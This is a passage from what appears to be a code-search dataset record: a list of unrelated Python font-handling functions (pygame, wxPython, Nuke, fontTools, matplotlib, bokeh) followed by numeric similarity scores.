save_font_image(pygame_menu.font.FONT_MUNRO, text, '_static/font_munro.png')\n save_font_image(pygame_menu.font.FONT_NEVIS, text, '_static/font_nevis.png')\n save_font_image(pygame_menu.font.FONT_OPEN_SANS, text, '_static/font_open_sans.png')\n save_font_image(pygame_menu.font.FONT_OPEN_SANS_BOLD, text, '_static/font_open_sans_bold.png')\n save_font_image(pygame_menu.font.FONT_OPEN_SANS_ITALIC, text, '_static/font_open_sans_italic.png')\n save_font_image(pygame_menu.font.FONT_OPEN_SANS_LIGHT, text, '_static/font_open_sans_light.png')\n save_font_image(pygame_menu.font.FONT_PT_SERIF, text, '_static/font_pt_serif.png')", "def SetFont(self, font):\r\n \r\n if self._header_win:\r\n self._header_win.SetFont(font)\r\n self.CalculateAndSetHeaderHeight()\r\n self._header_win.Refresh()\r\n \r\n if self._main_win:\r\n return self._main_win.SetFont(font)\r\n else:\r\n return False", "def loadCustomFont(path,name,size):\n\n fullname = os.path.join(path,name)\n f = pygame.font.Font(fullname,size)\n return f", "def GetFont(self, id):\r\n \r\n if id == AUI_DOCKART_CAPTION_FONT:\r\n return self._caption_font\r\n \r\n return wx.NullFont", "def SetNormalFont(self, font):\r\n \r\n self._normal_font = font", "def AdjustFontSize(self):\r\n self.sh.Columns(\"A\").Delete()", "def setDefaultSettings():\n if PLATFORM == 'Windows':\n font = 'Consolas'\n else:\n font = 'Monospace'\n\n preferenceNode = nuke.toNode('preferences')\n # viewer settings\n preferenceNode['maxPanels'].setValue(5)\n preferenceNode['TextureSize'].setValue('2048x2048')\n preferenceNode['viewer_bg_color_3D'].setValue(1280068863)\n preferenceNode['viewer_fg_color_3D'].setValue(4294967295L)\n preferenceNode['Viewer3DControlEmulation'].setValue('Maya')\n preferenceNode['middleButtonPans'].setValue(False)\n preferenceNode['dot_node_scale'].setValue(1.5)\n\n # 
script editor settings\n preferenceNode['clearOnSuccess'].setValue(False)\n preferenceNode['echoAllCommands'].setValue(True)\n preferenceNode['ScriptEditorFont'].setValue(font)\n preferenceNode['ScriptEditorFontSize'].setValue(12.0)\n preferenceNode['kwdsFgColour'].setValue(2629566719L)\n preferenceNode['stringLiteralsFgColourDQ'].setValue(10354943)\n preferenceNode['stringLiteralsFgColourSQ'].setValue(10354943)\n preferenceNode['commentsFgColour'].setValue(2442236415L)", "def get_fonts():\r\n return pygame.font.get_fonts()", "def SetMeasuringFont(self, font):\r\n \r\n self._measuring_font = font", "def apply_web_specific_fixes(font, unhinted, family_name):\n # Set OS/2 table values to old values\n os2 = font['OS/2']\n os2.sTypoAscender = 1536\n os2.sTypoDescender = -512\n os2.sTypoLineGap = 102\n os2.usWinAscent = 1946\n os2.usWinDescent = 512\n apply_web_cros_common_fixes(font, unhinted, family_name)", "def SetFont(self, font): \r\n\r\n res = wx.PyControl.SetFont(self, font)\r\n\r\n if self._art:\r\n self._art.SetFont(font)\r\n \r\n return res", "def set_font_size(fig):\n fig.title.text_font_size = FONT_SIZE\n fig.xaxis.axis_label_text_font_size = FONT_SIZE\n fig.yaxis.axis_label_text_font_size = FONT_SIZE\n fig.xaxis.major_label_text_font_size = FONT_SIZE\n fig.yaxis.major_label_text_font_size = FONT_SIZE\n fig.legend.label_text_font_size = FONT_SIZE", "def comdlg32_ChooseFont(jitter, get_str, set_str):\n ret_ad, args = jitter.func_args_stdcall([\"lpcf\"])\n raise RuntimeError('API not implemented')\n jitter.func_ret_stdcall(ret_ad, ret_value)", "def init():\n global _default_foreground, _default_background, _default_style\n try:\n attrs = GetConsoleScreenBufferInfo().wAttributes\n except (ArgumentError, WindowsError):\n _default_foreground = GREY\n _default_background = BLACK\n _default_style = NORMAL\n else:\n _default_foreground = attrs & 7\n _default_background = (attrs >> 4) & 7\n _default_style = attrs & BRIGHT", "def SetNormalFont(self, font):\r\n\r\n self._art.SetNormalFont(font)", "def _get_font_button(field_size):\r\n font_size = int(field_size * 2) # calculates font's size\r\n return pygame.font.SysFont(None, font_size) # returns font\r", "def test_default_run_ubuntu():\n test_dir = os.path.join(\"tests\", \"test_files\", \"fonts\", \"temp\")\n notouch_inpath = os.path.join(\"tests\", \"test_files\", \"fonts\", \"Ubuntu-Regular.ttf\")\n test_inpath = os.path.join(\n \"tests\", \"test_files\", \"fonts\", \"temp\", \"Ubuntu-Regular.ttf\"\n )\n test_outpath = os.path.join(\n \"tests\", \"test_files\", \"fonts\", \"temp\", \"Ubuntu-Regular-dehinted.ttf\"\n )\n test_args = [test_inpath]\n\n # setup\n if os.path.isdir(test_dir):\n shutil.rmtree(test_dir)\n os.mkdir(test_dir)\n shutil.copyfile(notouch_inpath, test_inpath)\n\n # execute\n run(test_args)\n\n # test\n font_validator(test_outpath)\n\n # tear down\n shutil.rmtree(test_dir)", "def rec_default(self):\n self.generations.setText('5')\n self.metrics.setText('(\"chi\",\"chi\",\"area\",\"chi\",\"sharpness\")')\n self.breed_modes.setText('(\"sqrt_ab\",\"sqrt_ab\",\"avg_ab\",\"max_ab_pa\",\"sqrt_ab\")')\n self.removes.setText('(2,2,1)')\n self.ga_support_thresholds.setText('(.1,.1,.1,.1,.1)')\n self.ga_support_sigmas.setText('(1.0,1.0,1.0,1.0)')\n self.lr_sigmas.setText('(2.0,1.5)')\n self.gen_pcdi_start.setText('3')\n self.active.setChecked(True)", "def available_text_fonts():\n bad = [u'acalc',\n u'acb',\n u'aco',\n u'acp']\n all = available_fonts()\n fonts = []\n for f in all:\n if (f == u'Series 60 ZDigi'):\n continue\n for b 
in bad:\n try:\n if (f.lower().startswith(b) and f[len(b)].isdigit()):\n break\n except IndexError:\n pass\n else:\n fonts.append(f)\n\n\n\n def compare(a, b):\n return -(a.lower() < b.lower())\n\n\n fonts.sort(compare)\n return fonts", "def set_font(self, font='A'):\n upper = font.upper()\n if upper == 'B':\n self._set_print_mode(self.FONT_MASK)\n elif upper == 'A':\n self._unset_print_mode(self.FONT_MASK)\n else:\n self._unset_print_mode(self.FONT_MASK)", "def default_plt_options():\n params = {'mathtext.default': 'regular',\n 'font.family': 'serif', 'text.usetex': False}\n plt.rcParams.update(params)", "def set_font_size(window, size):\n\n font = window.GetFont()\n\n clone = clone_font(font)\n clone.SetPointSize(size)\n\n window.SetFont(clone)\n\n sizer = window.GetSizer()\n if sizer is not None:\n sizer.Layout()\n \n window.Refresh()\n\n for child in window.GetChildren():\n set_font_size(child, size)\n \n return", "def scale_name(self):\n if len(self.name) > 8:\n self.name = self.name[:8]\n self.name_font = pygame.font.SysFont(\"Times\", 20)\n\n if len(self.opp_name) <= 8:\n self.opp_name_font = pygame.font.SysFont(\"Times\", 20)\n else:\n self.opp_name_font = pygame.font.SysFont(\"Times\", 15)\n return", "def get_font_dict(f):\n return tk_font.Font(font=f).actual()" ]
[ "0.68280387", "0.6737032", "0.6695929", "0.6610507", "0.64827216", "0.6389932", "0.6196747", "0.6126894", "0.60420203", "0.60152656", "0.59716773", "0.596298", "0.593417", "0.5910025", "0.5883346", "0.58664095", "0.58539915", "0.5838941", "0.58219564", "0.58039767", "0.578717", "0.575832", "0.57524735", "0.5694457", "0.5687482", "0.56561804", "0.5655132", "0.5655132", "0.564786", "0.56450135", "0.56177676", "0.56016916", "0.5601545", "0.5575735", "0.5563804", "0.55414814", "0.5490364", "0.5487726", "0.54841447", "0.5465644", "0.54559374", "0.54439014", "0.5438704", "0.5429805", "0.5422846", "0.54116106", "0.54103017", "0.54029137", "0.5389722", "0.53758717", "0.5365248", "0.535637", "0.5352313", "0.5352135", "0.5332061", "0.5329785", "0.5317767", "0.52936834", "0.52788126", "0.5265701", "0.5251513", "0.52428555", "0.52325845", "0.52180004", "0.5217646", "0.5212647", "0.5212647", "0.5212647", "0.52124906", "0.5209657", "0.5208829", "0.5198707", "0.51895344", "0.51862675", "0.5180124", "0.5174668", "0.51719785", "0.51693535", "0.5166607", "0.5157251", "0.51498425", "0.5147061", "0.5145401", "0.51434994", "0.5140011", "0.5137312", "0.5136769", "0.51297134", "0.5126503", "0.5118875", "0.51155716", "0.51100934", "0.5109338", "0.510912", "0.5105606", "0.51046795", "0.5101809", "0.5097481", "0.5089087", "0.50757" ]
0.829493
0
sets up Client Properties for JFileChooser() to behave as required >> Mac only
def setJFileChooserParameters(_jf, lReportOnly=False, lDefaults=False, lPackagesT=None, lApplicationsT=None, lOptionsButton=None, lNewFolderButton=None):

    myPrint("D", "In ", inspect.currentframe().f_code.co_name, "()")

    if not Platform.isOSX(): return
    if not isinstance(_jf, JFileChooser): return

    _PKG = "JFileChooser.packageIsTraversable"
    _APP = "JFileChooser.appBundleIsTraversable"
    _OPTIONS = "JFileChooser.optionsPanelEnabled"
    _NEWFOLDER = "JFileChooser.canCreateDirectories"

    # JFileChooser defaults: https://violetlib.org/vaqua/filechooser.html
    # "JFileChooser.packageIsTraversable"   default False >> set "true" to allow Packages to be traversed
    # "JFileChooser.appBundleIsTraversable" default False >> set "true" to allow App Bundles to be traversed
    # "JFileChooser.optionsPanelEnabled"    default False >> set "true" to allow Options button
    # "JFileChooser.canCreateDirectories"   default False >> set "true" to allow New Folder button

    if debug or lReportOnly:
        myPrint("B", "Parameters set: ReportOnly: %s, Defaults:%s, PackagesT: %s, ApplicationsT:%s, OptionButton:%s, NewFolderButton: %s"
                %(lReportOnly, lDefaults, lPackagesT, lApplicationsT, lOptionsButton, lNewFolderButton))
        txt = ("Before setting" if not lReportOnly else "Reporting only")
        for setting in [_PKG, _APP, _OPTIONS, _NEWFOLDER]:
            myPrint("DB", "%s: '%s': '%s'" %(pad(txt,14), pad(setting,50), _jf.getClientProperty(setting)))
        if lReportOnly: return

    if lDefaults:
        _jf.putClientProperty(_PKG, None)
        _jf.putClientProperty(_APP, None)
        _jf.putClientProperty(_OPTIONS, None)
        _jf.putClientProperty(_NEWFOLDER, None)
    else:
        if lPackagesT is not None:       _jf.putClientProperty(_PKG, lPackagesT)
        if lApplicationsT is not None:   _jf.putClientProperty(_APP, lApplicationsT)
        if lOptionsButton is not None:   _jf.putClientProperty(_OPTIONS, lOptionsButton)
        if lNewFolderButton is not None: _jf.putClientProperty(_NEWFOLDER, lNewFolderButton)

    for setting in [_PKG, _APP, _OPTIONS, _NEWFOLDER]:
        myPrint("DB", "%s: '%s': '%s'" %(pad("After setting",14), pad(setting,50), _jf.getClientProperty(setting)))

    return
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setFileDialogParameters(lReportOnly=False, lDefaults=False, lSelectDirectories=None, lPackagesT=None):\n\n myPrint(\"D\", \"In \", inspect.currentframe().f_code.co_name, \"()\")\n\n if not Platform.isOSX(): return\n\n _TRUE = \"true\"\n _FALSE = \"false\"\n\n _DIRS_FD = \"apple.awt.fileDialogForDirectories\" # When True you can select a Folder (rather than a file)\n _PKGS_FD = \"apple.awt.use-file-dialog-packages\" # When True allows you to select a 'bundle' as a file; False means navigate inside the bundle\n # \"com.apple.macos.use-file-dialog-packages\" # DEPRECATED since Monterrey - discovered this about MD2022.5(4090) - refer: java.desktop/sun/lwawt/macosx/CFileDialog.java\n\n # FileDialog defaults\n # \"apple.awt.fileDialogForDirectories\" default \"false\" >> set \"true\" to allow Directories to be selected\n # \"apple.awt.use-file-dialog-packages\" default \"true\" >> set \"false\" to allow access to Mac 'packages'\n\n if debug or lReportOnly:\n myPrint(\"B\", \"Parameters set: ReportOnly: %s, Defaults:%s, SelectDirectories:%s, PackagesT:%s\" % (lReportOnly, lDefaults, lSelectDirectories, lPackagesT))\n txt = (\"Before setting\" if not lReportOnly else \"Reporting only\")\n for setting in [_DIRS_FD, _PKGS_FD]: myPrint(\"DB\", \"%s: '%s': '%s'\" %(pad(txt,14), pad(setting,50), System.getProperty(setting)))\n if lReportOnly: return\n\n if lDefaults:\n System.setProperty(_DIRS_FD,_FALSE)\n System.setProperty(_PKGS_FD,_TRUE)\n else:\n if lSelectDirectories is not None: System.setProperty(_DIRS_FD, (_TRUE if lSelectDirectories else _FALSE))\n if lPackagesT is not None: System.setProperty(_PKGS_FD, (_TRUE if lPackagesT else _FALSE))\n\n for setting in [_DIRS_FD, _PKGS_FD]: myPrint(\"DB\", \"After setting: '%s': '%s'\" %(pad(setting,50), System.getProperty(setting)))\n\n return", "def readInConfigFileDlg( self ):\n pass", "def askOpen(parent,title='',defaultDir='',defaultFile='',wildcard='',style=wx.OPEN):\r\n defaultDir,defaultFile = [GPath(x).s for x in (defaultDir,defaultFile)]\r\n dialog = wx.FileDialog(parent,title,defaultDir,defaultFile,wildcard, style )\r\n if dialog.ShowModal() != wx.ID_OK: \r\n result = False\r\n elif style & wx.MULTIPLE:\r\n result = map(GPath,dialog.GetPaths())\r\n else:\r\n result = GPath(dialog.GetPath())\r\n dialog.Destroy()\r\n return result", "def input_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._input_path_var.set(filename)", "def pkg_app_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._pkg_app_path_var.set(filename)", "def onLoad (self):\n #productive #onButton\n profprint()\n self.fileDialog = qt.QFileDialog(self.parent)\n self.fileDialog.setDirectory(slicer.modules.needlefinder.path.replace(\"NeedleFinder.py\",\"Config\"))\n self.fileDialog.options = self.fileDialog.DontUseNativeDialog\n self.fileDialog.acceptMode = self.fileDialog.AcceptOpen\n self.fileDialog.defaultSuffix = \"cfg\"\n self.fileDialog.setNameFilter(\"Configuration File (*.cfg)\")\n self.fileDialog.connect(\"fileSelected(QString)\", self.onLoadFileSelected)\n self.fileDialog.show()", "def __init__(self, parent):\n super(CookiesConfigurationDialog, self).__init__(parent)\n self.setupUi(self)\n \n self.__mw = parent\n \n jar = self.__mw.cookieJar()\n acceptPolicy = jar.acceptPolicy()\n if acceptPolicy == CookieJar.AcceptAlways:\n self.acceptCombo.setCurrentIndex(0)\n elif acceptPolicy == CookieJar.AcceptNever:\n self.acceptCombo.setCurrentIndex(1)\n elif acceptPolicy == CookieJar.AcceptOnlyFromSitesNavigatedTo:\n 
self.acceptCombo.setCurrentIndex(2)\n \n keepPolicy = jar.keepPolicy()\n if keepPolicy == CookieJar.KeepUntilExpire:\n self.keepUntilCombo.setCurrentIndex(0)\n elif keepPolicy == CookieJar.KeepUntilExit:\n self.keepUntilCombo.setCurrentIndex(1)\n \n self.filterTrackingCookiesCheckbox.setChecked(\n jar.filterTrackingCookies())\n \n msh = self.minimumSizeHint()\n self.resize(max(self.width(), msh.width()), msh.height())", "def __init__(self, parent=None):\n super(E5ComboPathPicker, self).__init__(parent, useLineEdit=False)", "def onLoad (self):\r\n # productive #onButton\r\n profprint()\r\n self.dirDialog = qt.QFileDialog(self.parent)\r\n self.dirDialog.setDirectory(slicer.modules.needlefinder.path.replace(\"NeedleFinder.py\", \"Config\"))\r\n self.dirDialog.options = self.dirDialog.DontUseNativeDialog\r\n self.dirDialog.acceptMode = self.dirDialog.AcceptOpen\r\n self.dirDialog.defaultSuffix = \"cfg\"\r\n self.dirDialog.setNameFilter(\"Configuration File (*.cfg)\")\r\n self.dirDialog.connect(\"fileSelected(QString)\", self.onLoadFileSelected)\r\n self.dirDialog.show()", "def __showPathPickerDialog(self):\n if self.__mode == E5PathPickerModes.NoMode:\n return\n \n if self.__mode == E5PathPickerModes.CustomMode:\n self.pickerButtonClicked.emit()\n return\n \n self.aboutToShowPathPickerDialog.emit()\n \n windowTitle = self.__windowTitle\n if not windowTitle:\n if self.__mode == E5PathPickerModes.OpenFileMode:\n windowTitle = self.tr(\"Choose a file to open\")\n elif self.__mode == E5PathPickerModes.OpenFilesMode:\n windowTitle = self.tr(\"Choose files to open\")\n elif self.__mode in [\n E5PathPickerModes.SaveFileMode,\n E5PathPickerModes.SaveFileEnsureExtensionMode,\n E5PathPickerModes.SaveFileOverwriteMode]:\n windowTitle = self.tr(\"Choose a file to save\")\n elif self.__mode == E5PathPickerModes.DirectoryMode:\n windowTitle = self.tr(\"Choose a directory\")\n \n directory = self._editorText()\n if not directory and self.__defaultDirectory:\n directory = self.__defaultDirectory\n if self.__mode == E5PathPickerModes.OpenFilesMode:\n directory = os.path.expanduser(directory.split(\";\")[0])\n else:\n directory = os.path.expanduser(directory)\n if not os.path.isabs(directory) and self.__defaultDirectory:\n directory = os.path.join(self.__defaultDirectory, directory)\n directory = Utilities.fromNativeSeparators(directory)\n \n if self.__mode == E5PathPickerModes.OpenFileMode:\n path = E5FileDialog.getOpenFileName(\n self,\n windowTitle,\n directory,\n self.__filters)\n path = Utilities.toNativeSeparators(path)\n elif self.__mode == E5PathPickerModes.OpenFilesMode:\n paths = E5FileDialog.getOpenFileNames(\n self,\n windowTitle,\n directory,\n self.__filters)\n path = \";\".join([Utilities.toNativeSeparators(path)\n for path in paths])\n elif self.__mode == E5PathPickerModes.SaveFileMode:\n path = E5FileDialog.getSaveFileName(\n self,\n windowTitle,\n directory,\n self.__filters,\n E5FileDialog.Options(E5FileDialog.DontConfirmOverwrite))\n path = Utilities.toNativeSeparators(path)\n elif self.__mode == E5PathPickerModes.SaveFileEnsureExtensionMode:\n path, selectedFilter = E5FileDialog.getSaveFileNameAndFilter(\n self,\n windowTitle,\n directory,\n self.__filters,\n None,\n E5FileDialog.Options(E5FileDialog.DontConfirmOverwrite))\n path = Utilities.toNativeSeparators(path)\n if path:\n ext = QFileInfo(path).suffix()\n if not ext:\n ex = selectedFilter.split(\"(*\")[1].split(\")\")[0]\n if ex:\n path += ex\n elif self.__mode == E5PathPickerModes.SaveFileOverwriteMode:\n path = 
E5FileDialog.getSaveFileName(\n self,\n windowTitle,\n directory,\n self.__filters)\n path = Utilities.toNativeSeparators(path)\n elif self.__mode == E5PathPickerModes.DirectoryMode:\n path = E5FileDialog.getExistingDirectory(\n self,\n windowTitle,\n directory,\n E5FileDialog.Options(E5FileDialog.ShowDirsOnly))\n path = Utilities.toNativeSeparators(path)\n while path.endswith(os.sep):\n path = path[:-1]\n elif self.__mode == E5PathPickerModes.DirectoryShowFilesMode:\n path = E5FileDialog.getExistingDirectory(\n self,\n windowTitle,\n directory,\n E5FileDialog.Options(E5FileDialog.DontUseNativeDialog))\n path = Utilities.toNativeSeparators(path)\n while path.endswith(os.sep):\n path = path[:-1]\n \n if path:\n self._setEditorText(path)\n self.pathSelected.emit(path)", "def saveInConfigFileDlg( self ):\n pass", "def __init__(self, parent, state, position = wx.DefaultPosition):\n ##Set up data.\n self.state = state\n modeName = MODE_LIST[self.state.GetSurface(\"Mode\")]\n wx.Dialog.__init__(self, parent, -1, \"%s Mode Settings\" %(modeName),\n pos = position,\n style = wx.DEFAULT_FRAME_STYLE ^ (wx.RESIZE_BORDER | \n wx.MINIMIZE_BOX |\n wx.MAXIMIZE_BOX)\n | wx.TAB_TRAVERSAL)\n ##Jconf pull-down menu.\n \n self.lblStBox1 = wx.StaticBox(self, -1, \"Programs to launch\" )\n ##Name Server checkbox.\n self.cbNameServer = wx.CheckBox(self, -1, \"Name Server\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.cbNameServer.SetToolTip(wx.ToolTip(\"Run Name Server at Launch\"))\n ##Conductor checkbox.\n self.cbConductor = wx.CheckBox(self, -1, \"Conductor\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.cbConductor.SetToolTip(wx.ToolTip(\"Run Conductor at Launch\"))\n ##Xplorer checkbox.\n self.cbXplorer = wx.CheckBox(self, -1, \"Xplorer\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.cbXplorer.SetToolTip(wx.ToolTip(\"Run Xplorer at Launch\"))\n ##Desktop checkbox.\n self.cbDesktop = wx.CheckBox(self, -1, \"Desktop Mode\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.cbDesktop.SetToolTip(wx.ToolTip(\"Set Desktop Mode for\" +\n \" Conductor and Xplorer\"))\n \n self.lblStBox2 = wx.StaticBox(self, -1, \"Xplorer Configuration\" )\n ##Xplorer Type radio box.\n self.rbXplorer = wx.RadioBox(self, -1, \"Mode\",\n wx.DefaultPosition, wx.DefaultSize,\n RADIO_XPLORER_LIST, 1, wx.RA_SPECIFY_ROWS)\n self.rbXplorer.SetToolTip(wx.ToolTip(\"Which Xplorer format do you\" +\n \" want to launch?\"))\n ##Cluster button.\n self.bCluster = wx.Button(self, -1, \"Cluster Settings\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.bCluster.SetToolTip(wx.ToolTip(\"Set the computers and extra\" +\n \" variables in the cluster.\"))\n ##Configuration Choice\n self.chJconf = wx.Choice(self, -1, wx.DefaultPosition, [150,-1])\n self.chJconf.SetToolTip(wx.ToolTip(\"Choose Xplorer's configuration.\"))\n ##Edit Jconf button.\n self.bEditJconf = wx.Button(self, -1, \"Edit Configuration List\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.bEditJconf.SetToolTip(wx.ToolTip(\"Edit the list of Xplorer\" +\n \" configurations.\")) \n #OK and Cancel button\n if windows:\n self.bOk = wx.Button( self, wx.ID_OK, \"OK\", wx.DefaultPosition, wx.DefaultSize, 0 )\n else:\n self.bOk = wx.Button( self, wx.ID_SAVE, \"Save\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.bCancel = wx.Button( self, wx.ID_CANCEL, \"Cancel\", wx.DefaultPosition, wx.DefaultSize, 0 )\n \n ##Bind events.\n self.Bind(wx.EVT_LISTBOX, self.Refresh, self.chJconf)\n self.Bind(wx.EVT_CHECKBOX, self.Refresh, self.cbXplorer)\n self.Bind(wx.EVT_RADIOBOX, self.Refresh, 
self.rbXplorer)\n self.Bind(wx.EVT_CHECKBOX, self.Refresh, self.cbConductor)\n self.Bind(wx.EVT_CHECKBOX, self.Refresh, self.cbDesktop)\n \"\"\"\n self.Bind(wx.EVT_LISTBOX, self.UpdateData, self.chJconf)\n self.Bind(wx.EVT_CHECKBOX, self.UpdateData, self.cbXplorer)\n self.Bind(wx.EVT_RADIOBOX, self.UpdateData, self.rbXplorer)\n self.Bind(wx.EVT_CHECKBOX, self.UpdateData, self.cbConductor)\n self.Bind(wx.EVT_CHECKBOX, self.UpdateData, self.cbDesktop)\n \"\"\"\n self.Bind(wx.EVT_CLOSE, self.OnClose)\n if windows:\n self.Bind(wx.EVT_BUTTON, self.OnOk, id = wx.ID_OK)\n else:\n self.Bind(wx.EVT_BUTTON, self.OnOk, id = wx.ID_SAVE)\n self.Bind(wx.EVT_BUTTON, self.EditJconf, self.bEditJconf)\n self.Bind(wx.EVT_BUTTON, self.EditCluster, self.bCluster)\n \n ##Set sizers.\n vSizerMain = wx.BoxSizer( wx.VERTICAL )\n vSizer1 = wx.BoxSizer( wx.VERTICAL )\n svSizer1 = wx.StaticBoxSizer( self.lblStBox1, wx.VERTICAL )\n svSizer1.Add( self.cbNameServer, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5 )\n hSizer1 = wx.BoxSizer( wx.HORIZONTAL )\n hSizer1.Add( self.cbConductor, 0, wx.ALIGN_CENTER|wx.ALL, 5 )\n spacer1 = wx.StaticText(self, -1, \" \", wx.DefaultPosition, wx.DefaultSize, 0 )\n hSizer1.Add( spacer1, 0, wx.ALIGN_CENTER, 5 )\n hSizer1.Add( self.cbDesktop, 0, wx.ALIGN_CENTER|wx.ALL, 5 )\n svSizer1.Add( hSizer1, 0, wx.ALIGN_CENTER_VERTICAL, 5 )\n svSizer1.Add( self.cbXplorer, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5 )\n vSizer1.Add( svSizer1, 0, wx.GROW|wx.ALIGN_CENTER_VERTICAL|wx.TOP, 5 )\n spacer2 = wx.StaticText(self, -1, \"\", wx.DefaultPosition, [10,10], 0 )\n vSizer1.Add( spacer2, 0, wx.ALIGN_CENTER, 5 )\n svSizer2 = wx.StaticBoxSizer( self.lblStBox2, wx.VERTICAL )\n hSizer2 = wx.BoxSizer( wx.HORIZONTAL )\n hSizer2.Add( self.rbXplorer, 0, wx.ALIGN_CENTER|wx.ALL, 5 )\n hSizer2.Add( self.bCluster, 0, wx.ALIGN_CENTER|wx.LEFT|wx.RIGHT|wx.TOP, 5 )\n svSizer2.Add( hSizer2, 0, wx.ALIGN_CENTER_VERTICAL, 5 )\n hSizer3 = wx.BoxSizer( wx.HORIZONTAL )\n hSizer3.Add( self.chJconf, 0, wx.ALIGN_CENTER|wx.ALL, 5 )\n hSizer3.Add( self.bEditJconf, 0, wx.ALIGN_CENTER|wx.ALL, 5 )\n svSizer2.Add( hSizer3, 0, wx.ALIGN_CENTER, 5 )\n vSizer1.Add( svSizer2, 0, wx.GROW|wx.ALIGN_CENTER_VERTICAL, 5 )\n hSizer4 = wx.BoxSizer( wx.HORIZONTAL )\n if windows:\n hSizer4.Add( self.bOk, 0, wx.ALIGN_CENTER|wx.ALL, 5 ) \n hSizer4.Add( self.bCancel, 0, wx.ALIGN_CENTER|wx.LEFT|wx.TOP|wx.BOTTOM, 5 )\n else: \n hSizer4.Add( self.bCancel, 0, wx.ALIGN_CENTER|wx.ALL, 5 ) \n hSizer4.Add( self.bOk, 0, wx.ALIGN_CENTER|wx.LEFT|wx.TOP|wx.BOTTOM, 5 )\n vSizer1.Add( hSizer4, 0, wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL|wx.LEFT|wx.TOP, 5 )\n vSizerMain.Add( vSizer1, 0, wx.ALIGN_CENTER|wx.ALL, 5 ) \n \n vSizerMain.SetSizeHints(self)\n self.SetSizer(vSizerMain)\n #self.CenterOnParent(wx.BOTH)\n ##Set the background color.\n #Style(self)\n if not CLUSTER_ENABLED:\n self.bCluster.Hide()\n ##Set up OK button.\n ##Update Display\n self.React()", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)", "def import_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._import_path_var.set(filename)", "def on_browse(self, event):\r\n wildcard = \"All files (*.*)|*.*\"\r\n with wx.FileDialog(None, \"Choose a file\",\r\n wildcard=wildcard,\r\n style=wx.ID_OPEN) as dialog:\r\n if dialog.ShowModal() == wx.ID_OK:\r\n self.grin_location.SetValue(dialog.GetPath())", "def 
import_file_chooser(self):\n filename = tk.filedialog.askopenfilenames()\n self._import_path_var.set(filename)", "def browse(self):\n\n self.filepath.set(fd.askopenfilename(initialdir=self._initaldir,\n filetypes=self._filetypes))", "def set_spec_file(self):\n self.specfile = select_file(os.getcwd())\n if self.specfile is not None:\n self.spec_file_button.setStyleSheet(\"Text-align:left\")\n self.spec_file_button.setText(self.specfile)\n else:\n self.specfile = None\n self.spec_file_button.setText('')\n if self.is_exp_exists() or self.is_exp_set():\n self.set_experiment()", "def initProperties(self):\n self.setFoldComments(Preferences.getEditor(\"CssFoldComment\"))\n self.setFoldCompact(Preferences.getEditor(\"AllFoldCompact\"))\n try:\n self.setHSSLanguage(\n Preferences.getEditor(\"CssHssSupport\"))\n self.setLessLanguage(\n Preferences.getEditor(\"CssLessSupport\"))\n self.setSCSSLanguage(\n Preferences.getEditor(\"CssSassySupport\"))\n except AttributeError:\n pass", "def AutomagicalSettings(self):\n # Try to find gclient or repo root first.\n if not self.options.no_search:\n self.toplevel_root = gclient_utils.FindGclientRoot(self.checkout_root)\n if self.toplevel_root:\n logging.info('Found .gclient at %s' % self.toplevel_root)\n else:\n self.toplevel_root = gclient_utils.FindFileUpwards(\n os.path.join('..', '.repo'), self.checkout_root)\n if self.toplevel_root:\n logging.info('Found .repo dir at %s'\n % os.path.dirname(self.toplevel_root))\n\n # Parse TRYSERVER_* settings from codereview.settings before falling back\n # on setting self.options.root manually further down. Otherwise\n # TRYSERVER_ROOT would never be used in codereview.settings.\n self._GclStyleSettings()\n\n if self.toplevel_root and not self.options.root:\n assert os.path.abspath(self.toplevel_root) == self.toplevel_root\n self.options.root = gclient_utils.PathDifference(self.toplevel_root,\n self.checkout_root)\n else:\n self._GclStyleSettings()", "def select_app():\n panel = Cocoa.NSOpenPanel.openPanel()\n panel.setCanChooseFiles_(True)\n panel.setCanChooseDirectories_(True)\n panel.setResolvesAliases_(True)\n\n if(panel.runModal() == Cocoa.NSOKButton):\n pathArray = panel.filenames()\n path = pathlib.Path(pathArray[0])\n\n plistPath = path /'Contents'/'Info.plist'\n infoFile = plistPath\n\n try:\n appSize = subprocess.check_output(['du', '-shg', str(path)]).split()[0].decode('utf-8')\n n.views['appSize'].setStringValue_(str(appSize))\n except Exception as err:\n print(err)\n\n n.views['appLocation'].setStringValue_(str(path))\n\n try:\n plist = str(infoFile)\n with open(plist, 'rb') as f:\n info = plistlib.load(f)\n\n if 'CFBundleName' in info:\n global collectedName\n collectedName = info['CFBundleName']\n n.views['appName'].setStringValue_(collectedName)\n else:\n n.views['appName'].setStringValue_('')\n\n if 'CFBundleShortVersionString' in info:\n global collectedVersion\n collectedVersion= info['CFBundleShortVersionString']\n n.views['appVersion'].setStringValue_(collectedVersion)\n else:\n n.views['appVersion'].setStringValue_('')\n\n if 'CFBundleIconFile' in info:\n global collectedIcon\n collectedIcon = pathlib.Path(plist).parent / 'Resources' / info['CFBundleIconFile']\n n.views['appIcon'].setStringValue_(str(collectedIcon))\n else:\n n.views['appIcon'].setStringValue_('')\n\n if 'CFBundleIdentifier' in info:\n global collectedIdentifier\n collectedIdentifier = info['CFBundleIdentifier']\n n.views['appIdentifier'].setStringValue_(collectedIdentifier)\n else:\n 
